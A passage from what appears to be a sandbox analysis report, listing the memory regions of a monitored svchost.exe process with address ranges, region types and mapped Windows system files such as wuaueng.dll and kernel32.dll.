0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1216 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1217 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1218 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1219 start_va = 0x3f0000 end_va = 0x3f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1220 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1221 start_va = 0x410000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1222 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1223 start_va = 0x450000 end_va = 0x45dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1224 start_va = 0x460000 end_va = 0x467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1225 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1226 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1227 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1228 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1229 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1230 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1231 start_va = 0x8f0000 end_va = 0x90bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1232 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 1233 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1234 start_va = 0x930000 end_va = 0x949fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 1235 start_va = 0x950000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 1236 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1237 start_va = 0x970000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 1238 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1239 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1240 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1241 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1242 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 1243 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1244 start_va = 0xa50000 end_va = 0xab5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1245 start_va = 0xac0000 end_va = 0xac0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1246 start_va = 0xad0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1247 start_va = 0xaf0000 end_va = 0xaf2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1248 start_va = 0xb00000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 1249 start_va = 0xb40000 end_va = 0xb40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1250 start_va = 0xbd0000 end_va = 0xe9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1251 start_va = 0xea0000 end_va = 0xea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1252 start_va = 0xeb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1253 start_va = 0xf30000 end_va = 0xf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1254 start_va = 0xf40000 end_va = 0xf41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1255 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1256 start_va = 0x1050000 end_va = 0x1050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1257 start_va = 0x1060000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 1258 start_va = 0x1070000 end_va = 0x1077fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1259 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1260 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1261 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1262 start_va = 0x1120000 end_va = 0x1127fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1263 start_va = 0x1130000 end_va = 0x113ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1264 start_va = 0x1140000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 1265 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1266 start_va = 0x1240000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 1267 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 1268 start_va = 0x1260000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1269 start_va = 0x1270000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 1270 start_va = 0x1280000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 1271 start_va = 0x1290000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 1272 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 1273 start_va = 0x12b0000 end_va = 0x12bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1274 start_va = 0x12c0000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1275 start_va = 0x12d0000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 1276 start_va = 0x12e0000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1277 start_va = 0x1360000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001360000" filename = "" Region: id = 1278 start_va = 0x1370000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 1279 start_va = 0x1380000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001380000" filename = "" Region: id = 1280 start_va = 0x1390000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001390000" filename = "" Region: id = 1281 start_va = 0x13a0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013a0000" filename = "" Region: id = 1282 start_va = 0x13b0000 end_va = 0x13bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 1283 start_va = 0x13c0000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 1284 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1285 start_va = 0x1450000 end_va = 0x1457fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 1286 start_va = 0x1460000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1287 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 1288 start_va = 0x1560000 end_va = 0x156ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 1289 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1290 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 1291 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1292 start_va = 0x1750000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 1293 start_va = 0x1770000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1294 start_va = 0x1830000 end_va = 0x18affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 1295 start_va = 0x18c0000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1296 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1297 start_va = 0x1ab0000 end_va = 0x1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 1298 start_va = 0x1b50000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1299 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1300 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1301 start_va = 0x1ce0000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1302 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1303 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1304 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1305 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1306 start_va = 0x2170000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 1307 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1308 start_va = 0x2270000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 1309 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1310 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1311 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1312 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1313 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1314 start_va = 0x2730000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1315 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1316 start_va = 0x27d0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1317 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1318 start_va = 0x29b0000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 1319 start_va = 0x2a50000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1320 start_va = 0x2c80000 end_va = 0x2d3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1321 start_va = 0x2ec0000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1322 start_va = 0x2f40000 end_va = 0x2fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 1323 start_va = 0x2ff0000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 1324 start_va = 0x3090000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1325 start_va = 0x3110000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1326 start_va = 0x33a0000 end_va = 0x33dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033a0000" filename = "" Region: id = 1327 start_va = 0x33e0000 end_va = 0x341ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033e0000" filename = "" Region: id = 1328 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1329 start_va = 0x34b0000 end_va = 0x352ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 1330 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1331 start_va = 0x35c0000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1332 start_va = 0x3740000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1333 start_va = 0x3910000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1334 start_va = 0x3a50000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 1335 start_va = 0x3b30000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 1336 start_va = 0x3bb0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 1337 start_va = 0x4050000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 1338 start_va = 0x4190000 end_va = 0x420ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 1339 start_va = 0x4210000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 1340 start_va = 0x4320000 end_va = 0x441ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 1341 start_va = 0x4450000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 1342 start_va = 0x44d0000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 1343 start_va = 0x45d0000 end_va = 0x464ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 1344 start_va = 0x4650000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 1345 start_va = 0x4850000 end_va = 0x494ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 1346 start_va = 0x4a30000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1347 start_va = 0x4a40000 end_va = 0x4b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 1348 start_va = 0x4b40000 end_va = 0x4c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 1349 start_va = 0x4c40000 end_va = 0x4d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c40000" filename = "" Region: id = 1350 start_va = 0x4d40000 end_va = 0x4e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 1351 start_va = 0x4e40000 end_va = 0x5e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 1352 start_va = 0x5ec0000 end_va = 0x5f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ec0000" filename = "" Region: id = 1353 start_va = 0x6070000 end_va = 0x60effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 1354 start_va = 0x6140000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 1355 start_va = 0x62b0000 end_va = 0x632ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 1356 start_va = 0x6340000 end_va = 0x63bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 1357 start_va = 0x63c0000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063c0000" filename = "" Region: id = 1358 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1359 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1360 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1361 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1362 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1363 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1364 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1365 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1366 start_va = 0x7fef03f0000 end_va = 0x7fef0642fff monitored = 0 entry_point = 0x7fef03f236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1367 start_va = 0x7fef14f0000 end_va = 0x7fef16c3fff monitored = 0 entry_point = 0x7fef1526b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1368 start_va = 0x7fef2140000 end_va = 0x7fef2184fff monitored = 0 entry_point = 0x7fef2173644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1369 start_va = 0x7fef2190000 end_va = 0x7fef21a1fff monitored = 0 entry_point = 0x7fef21990bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1370 start_va = 0x7fef2950000 end_va = 0x7fef2bc9fff monitored = 0 entry_point = 0x7fef2982200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1371 start_va = 0x7fef4120000 end_va = 0x7fef413bfff monitored = 0 entry_point = 0x7fef41211a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1372 start_va = 0x7fef4140000 end_va = 0x7fef41a1fff monitored = 0 entry_point = 0x7fef4141198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1373 start_va = 0x7fef41b0000 end_va = 0x7fef41e9fff monitored = 0 entry_point = 0x7fef41b1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1374 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1375 start_va = 0x7fef4990000 end_va = 0x7fef49acfff monitored = 0 entry_point = 0x7fef4992f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 1376 start_va = 0x7fef49c0000 end_va = 0x7fef49d4fff monitored = 0 entry_point = 0x7fef49c1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1377 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1378 start_va = 0x7fef4e30000 end_va = 0x7fef4ea0fff monitored = 0 entry_point = 0x7fef4e751d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1379 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1380 start_va = 0x7fef4ed0000 end_va = 0x7fef4f84fff monitored = 0 entry_point = 0x7fef4f4cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1381 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1382 start_va = 0x7fef4fa0000 end_va = 0x7fef4ff9fff monitored = 0 entry_point = 0x7fef4fddde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 